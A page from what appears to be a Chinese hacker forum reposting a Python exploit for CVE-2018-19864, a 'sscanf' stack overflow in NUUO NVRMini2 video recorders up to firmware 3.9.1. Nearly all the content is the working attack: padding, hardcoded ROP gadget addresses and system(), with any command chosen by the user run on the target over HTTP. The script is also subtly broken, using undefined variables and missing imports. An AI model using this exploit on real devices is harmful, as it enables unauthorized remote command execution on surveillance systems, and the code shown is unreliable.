跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
#   [ leading / ]
#   [ Padding x 335 ]
#   [ original value at stack pointer + 158 ]
#   [ padding x 80 ]
#   [ address of (pop {r3,lr} ; bx lr) ]
#   [ system() address ]
#   [ address of (mov r0,sp ; blx r3) ]
#   [ command to execute ]

def banner():
    print '''
              @0x00string
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''

def usage ():
    print   ("python script.py <args>\n"
            "   -h, --help:             Show this message\n"
            "   -a, --rhost:            Target IP address\n"
            "   -b, --rport:            Target Port - default 5150\n"
            "   -c, --command:          Command to execute\n"
            "\n"
            "Example:\n"
            "python script.py -a 10.10.10.10\n"
            "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
    exit()

def main():
    rhost = None;
    rport = "5150";
    command = "{/bin/touch,/tmp/hax}"
    banner()
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a','--rhost'):
            rhost = arg;
        elif opt in ('-b','--rport'):
            rport = arg;
        elif opt in ('-c','--command'):
            command = arg;
    print ("Sending exploit to execute [" + command + "]\n")
    buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
    "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
    "http://" + rhost + ":" + rport + "\r\n\r\n"
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(30)
    sock.connect((target_ip,int(target_port)))
    sock.send(buf)
    print ("done\n")

if __name__ == "__main__":
    main()

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。